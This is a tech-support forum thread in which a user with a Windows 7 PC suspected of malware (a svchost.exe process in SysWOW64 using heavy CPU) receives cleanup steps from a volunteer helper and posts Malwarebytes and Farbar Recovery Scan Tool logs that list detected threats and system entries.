Svchost.exe in SysWOW64 always uses 50% of my CPU

#1

Hello, I don't know if this is a problem with the PC; I think it is, because the file in the title has been using 50% of the CPU for a week now, as shown in the image. I have searched this forum for similar problems and I haven't dared to do much, since it is a file that may be a legitimate system file. Honestly, it looks like malware to me, because I don't think it's normal for it to always be like this. Thanks in advance.

#2

Hello @ricardo4e

Welcome to this new stage of InfoSpyware…!!!

Do the following to rule out an infection:

1.- Temporarily disable your antivirus and any other security program.

2.- Download, install and/or update the following tools:

3.- Run the steps, respecting the order:

CCleaner

Run it using its Cleaner option, according to its Manual:

  • To delete cookies, temporary Internet files and all the files it shows you as obsolete.
  • We do NOT need this report

AdwCleaner

Run it.

  • Click the Scan button and wait for the process to finish. Then click the Clean button.
  • Wait for it to complete. If it asks you to restart the system, accept.
  • Save the report that appears so you can copy and paste it into your next reply.
  • The report can also be found at “C:\AdwCleaner\AdwCleaner.txt”

Malwarebytes

  • Don't forget to update it.
  • Read its Manual carefully
  • Run a Custom Scan with all drives selected
  • Click “Remove Selected” to send what was found to quarantine.
  • Restart the system.
  • In the manual's “History” section >> Application Logs >> Scan Log you will find the MBAM report, which you must copy and paste into your next reply.

4.- Important note:

In your next reply you must paste the AdwCleaner and Malwarebytes reports.

Guide: How to paste reports in the forum?

Let us know.

Regards

#3

Hello, thanks for your reply,

The day before yesterday I ran Malwarebytes Anti-Malware again and it found threats; afterwards, in safe mode, I cleaned the computer with CCleaner and the process no longer ran again. In any case, I'm pasting the scan report.

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 2/25/19
Scan Time: 7:56 PM
Log File: 562b47e8-3961-11e9-847f-b8aeed393719.json

-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9442
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Michael-PC\Michael

-Scan Summary-
Scan Type: Custom Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 275025
Threats Detected: 7
Threats Quarantined: 7
Time Elapsed: 13 min, 37 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 1
Backdoor.Tofsee, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\qhpduwip, Quarantined, [4005], [642953],1.0.9442

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 6
Backdoor.Tofsee, C:\WINDOWS\SYSWOW64\QHPDUWIP\YTAXWTPQ.EXE, Quarantined, [4005], [642953],1.0.9442
Adware.FileTour, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\IMAGINGENGINE.DLL\15314\IC64.DLL, Quarantined, [437], [641561],1.0.9442
Trojan.MalPack, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\DETMZBUPYYD\BCN.EXE, Quarantined, [529], [642854],1.0.9442
Spyware.PasswordStealer, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\W3VVOLE2YR3\EBAY.EXE, Quarantined, [469], [641353],1.0.9442
Adware.Zdengo, C:\WINDOWS\LCPDXGSADXF.LCP, Quarantined, [496], [642690],1.0.9442
Rootkit.Agent.PUA, C:\WINDOWS\9B7FA4AB85B9.SYS, Quarantined, [418], [638809],1.0.9442

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

Thanks for helping me; I always look for help here, you are the best :smiley:

#4

Hello:

Thank you for trusting Forospyware!!!

You would still need to paste the AdwCleaner report.

Regards.

#5

Hello, I don't know if I can recover that log because I ran Delfix on it :confused: I think I would have to use some program that recovers deleted files or something like that, because I can't find the folder C:\AdwCleaner

#6

Hello:

You must not rush or carry out steps that we did not tell you to do; AdwCleaner has already been uninstalled.

Do the following:

1.- Temporarily disable your antivirus and any other security program.

2.- Download Farbar Recovery Scan Tool to the desktop, selecting the right version for your computer's architecture (32 or 64 bits). >> How to tell whether my Windows is 32 or 64 bits?

  • Run FRST.exe.
  • In the Disclaimer window message, click Yes
  • In the main window, click the Scan button and wait for the process to finish.
  • Two (2) files (logs) will open, Frst.txt and Addition.txt; these will be saved on the desktop.

Guide: How to run FRST

3.- In your next reply, paste the generated reports.

Guide: How to paste reports in the forum?

We await those reports.

Regards

#7

Hello, here are the logs

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.02.2019 01
Ran by Michael (administrator) on MICHAEL-PC (01-03-2019 14:01:44)
Running from C:\Users\Michael\Desktop
Loaded Profiles: Michael (Available Profiles: Michael)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Scarlet.Crush Productions) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
(DT Soft Ltd -> DT Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [112512 2010-03-13] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601928 2018-12-15] (Oracle America, Inc. -> Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [1305408 2011-01-05] (DT Soft Ltd -> DT Soft Ltd)
HKLM\Software\...\AppCompatFlags\InstalledSDB\{ad846bae-d44b-4722-abad-f7420e08bcd9}: [DatabasePath] -> C:\Windows\AppPatch\Custom\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb [2016-11-29]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.119\Installer\chrmstp.exe [2019-02-25] (Google LLC -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.40\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{34EE306A-D3DE-4A29-8B15-95DDDAC6CC6A}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-xl/?ocid=iehp
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll [2008-05-23] (Microsoft Corporation) [File not signed]
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-15] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-15] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-21] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-21] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-20] (Google Inc -> Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-20] (Google Inc -> Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default [2019-03-01]
CHR Extension: (Presentaciones) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-20]
CHR Extension: (Documentos) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-20]
CHR Extension: (Google Drive) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-20]
CHR Extension: (YouTube) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-20]
CHR Extension: (Hojas de cálculo) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-20]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-20]
CHR Extension: (AdBlock) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-02-25]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-20]
CHR Extension: (Gmail) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-20]
CHR Extension: (Chrome Media Router) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-20]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [389632 2016-01-10] (Scarlet.Crush Productions) [File not signed]
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Trusted Connect Service -> Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-15] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
S2 KMService; C:\Windows\SysWOW64\srvany.exe [8192 2019-02-02] () [File not signed]
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [254528 2018-12-05] (DT Soft Ltd -> DT Soft Ltd)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2019-02-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-15] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
R3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [121416 2012-05-12] (Shenzhen Saikeware Technology Co., Ltd. -> MotioninJoy)
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-03-01 14:01 - 2019-03-01 14:02 - 000014308 _____ C:\Users\Michael\Desktop\FRST.txt
2019-03-01 14:01 - 2019-03-01 14:01 - 000000000 ____D C:\FRST
2019-03-01 14:00 - 2019-03-01 14:01 - 002434048 _____ (Farbar) C:\Users\Michael\Desktop\FRST64.exe
2019-02-28 17:04 - 2019-02-28 17:04 - 000000000 ____D C:\Users\Michael\AppData\Local\Jagex
2019-02-28 17:04 - 2019-02-28 17:04 - 000000000 ____D C:\ProgramData\Jagex
2019-02-25 22:31 - 2019-02-25 22:31 - 354670792 _____ C:\Windows\system32\Limpio.reg
2019-02-25 20:31 - 2019-02-25 20:31 - 000001534 _____ C:\Windows\ntbtlog.txt
2019-02-25 20:19 - 2019-02-25 20:19 - 000001940 _____ C:\Users\Michael\Desktop\Malwarebytes Scan25-02-19.txt
2019-02-25 19:47 - 2019-02-25 19:47 - 000000000 ____D C:\ProgramData\Nefarius Software Solutions
2019-02-25 19:20 - 2019-02-25 20:38 - 000000664 _____ C:\DelFix.txt
2019-02-25 19:20 - 2019-02-25 19:20 - 000000000 ____D C:\Windows\ERUNT
2019-02-23 23:50 - 2019-02-23 23:50 - 000000982 _____ C:\Windows\SysWOW64\SysWOW64 - Acceso directo.lnk
2019-02-23 23:12 - 2019-02-23 23:12 - 000020076 _____ C:\Users\Michael\Desktop\Scan 23-2-19.txt
2019-02-23 21:24 - 2019-02-23 21:24 - 000000000 ____D C:\Users\Michael\AppData\Local\mbamtray
2019-02-23 21:24 - 2019-02-23 21:24 - 000000000 ____D C:\Users\Michael\AppData\Local\mbam
2019-02-23 21:23 - 2019-02-23 21:23 - 000001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-23 21:23 - 2019-02-23 21:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-23 21:23 - 2019-02-23 21:23 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-23 21:23 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-23 21:16 - 2013-03-29 15:22 - 000000878 _____ C:\Users\Michael\Desktop\Malwarebytes Anti-Malware.txt
2019-02-23 21:15 - 2019-02-23 21:23 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-23 21:15 - 2019-02-23 21:23 - 000000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2019-02-23 21:15 - 2013-01-02 20:03 - 010156344 _____ (Malwarebytes Corporation ) C:\Users\Michael\Desktop\mbam-setup-1.70.0.1100.exe
2019-02-23 17:36 - 2019-02-23 17:36 - 000000161 _____ C:\Users\Michael\Desktop\Nuevo documento de texto.txt
2019-02-23 17:19 - 2014-12-08 07:34 - 403800064 _____ C:\Users\Michael\Desktop\Biohazard - Outbreak - File 2 (Japan).iso
2019-02-23 17:16 - 2014-12-08 07:34 - 403800064 _____ C:\Users\Michael\Downloads\Biohazard - Outbreak - File 2 (Japan).iso
2019-02-23 17:12 - 2019-02-23 17:12 - 000000422 __RSH C:\ProgramData\ntuser.pol
2019-02-23 17:11 - 2019-02-23 17:11 - 000098400 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\libusbK.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000083552 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\SysWOW64\libusbK.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000076384 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\libusb0.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000067680 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\SysWOW64\libusb0.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000047200 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\Drivers\libusbK.sys
2019-02-23 17:07 - 2019-02-23 17:07 - 000003894 _____ C:\Windows\System32\Tasks\updater
2019-02-23 17:07 - 2019-02-23 17:07 - 000001223 _____ C:\Users\Public\Desktop\ScpToolkit Driver Installer.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001188 _____ C:\Users\Public\Desktop\ScpToolkit Settings Manager.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001188 _____ C:\Users\Public\Desktop\ScpToolkit Profile Manager.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001183 _____ C:\Users\Public\Desktop\ScpToolkit Updater.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001183 _____ C:\Users\Public\Desktop\ScpToolkit Monitor (legacy).lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit
2019-02-23 17:07 - 2019-02-23 17:07 - 000000000 ____D C:\Program Files\Nefarius Software Solutions
2019-02-23 17:06 - 2019-02-23 17:06 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Nefarius Software Solutions
2019-02-23 17:05 - 2019-02-23 17:06 - 023361996 _____ (Nefarius Software Solutions) C:\Users\Michael\Downloads\ScpToolkit_Setup.exe
2019-02-22 00:03 - 2019-02-22 00:02 - 2325150616 _____ C:\Users\Michael\Downloads\Biohazard - Outbreak - File 2 (Japan).7z
2019-02-21 23:11 - 2019-02-21 23:11 - 000377694 _____ C:\Users\Michael\Desktop\gpupeopssoftwin118b.zip
2019-02-21 23:07 - 2019-02-21 23:07 - 000175318 _____ C:\Users\Michael\Desktop\gpupeteogl209.zip
2019-02-21 17:46 - 2019-02-21 17:46 - 000000177 _____ C:\Users\Public\Desktop\RuneScape Launcher.url
2019-02-21 17:46 - 2019-02-21 17:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jagex
2019-02-21 17:46 - 2019-02-21 17:46 - 000000000 ____D C:\Program Files\Jagex
2019-02-20 23:48 - 2019-02-20 23:48 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Disabled Startup
2019-02-20 23:40 - 2019-02-25 19:42 - 000002222 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-20 23:40 - 2019-02-25 19:42 - 000002181 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-02-20 23:13 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\t4nb0jos5lf
2019-02-20 23:05 - 2019-02-20 23:21 - 000000000 ____D C:\Program Files (x86)\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:19 - 000000979 _____ C:\Users\Michael\Downloads\CCleaner.lnk
2019-02-20 23:05 - 2019-02-20 23:05 - 000002798 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2019-02-20 23:05 - 2019-02-20 23:05 - 000001023 _____ C:\Users\Michael\Downloads\RegSeeker.lnk
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Babylon
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\ProgramData\Babylon
2019-02-20 23:04 - 2019-02-25 20:38 - 000000000 ____D C:\Program Files (x86)\Trend Micro
2019-02-20 23:04 - 2019-02-20 23:05 - 000000000 ____D C:\Program Files\CCleaner
2019-02-20 23:04 - 2019-02-20 23:04 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
2019-02-20 22:32 - 2019-02-20 22:32 - 000000000 ____D C:\ProgramData\boost_interprocess
2019-02-20 22:28 - 2019-02-20 22:28 - 000000000 ____D C:\Users\Michael\AppData\Local\Deployment
2019-02-20 22:28 - 2019-02-20 22:28 - 000000000 ____D C:\Users\Michael\AppData\Local\Apps\2.0
2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:21 - 2019-02-20 22:21 - 000000011 _____ C:\Users\Michael\setup24.ini
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:20 - 2019-02-20 22:21 - 006161408 _____ C:\Users\Michael\AppData\Local\dump007.dat
2019-02-20 22:20 - 2019-02-20 22:20 - 000000009 _____ C:\Users\Michael\rstr4.ini
2019-02-20 22:12 - 2019-02-20 22:15 - 005939464 _____ (Jagex Ltd ) C:\Users\Michael\Downloads\RuneScape-Setup.exe
2019-02-20 22:08 - 2019-02-23 23:14 - 000000000 ____D C:\Users\Michael\AppData\Local\Maurice
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
2019-02-20 22:03 - 2019-02-20 22:03 - 000000003 _____ C:\Users\Michael\AppData\Local\wbem.ini
2019-02-20 21:59 - 2019-02-20 22:08 - 000000000 ____D C:\Program Files (x86)\Video
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-20 21:50 - 2019-02-21 17:48 - 000000000 ____D C:\Users\Michael\Desktop\PCSX2 1.4.0
2019-02-20 21:48 - 2019-02-20 21:48 - 000000000 ____D C:\Program Files\WinRAR
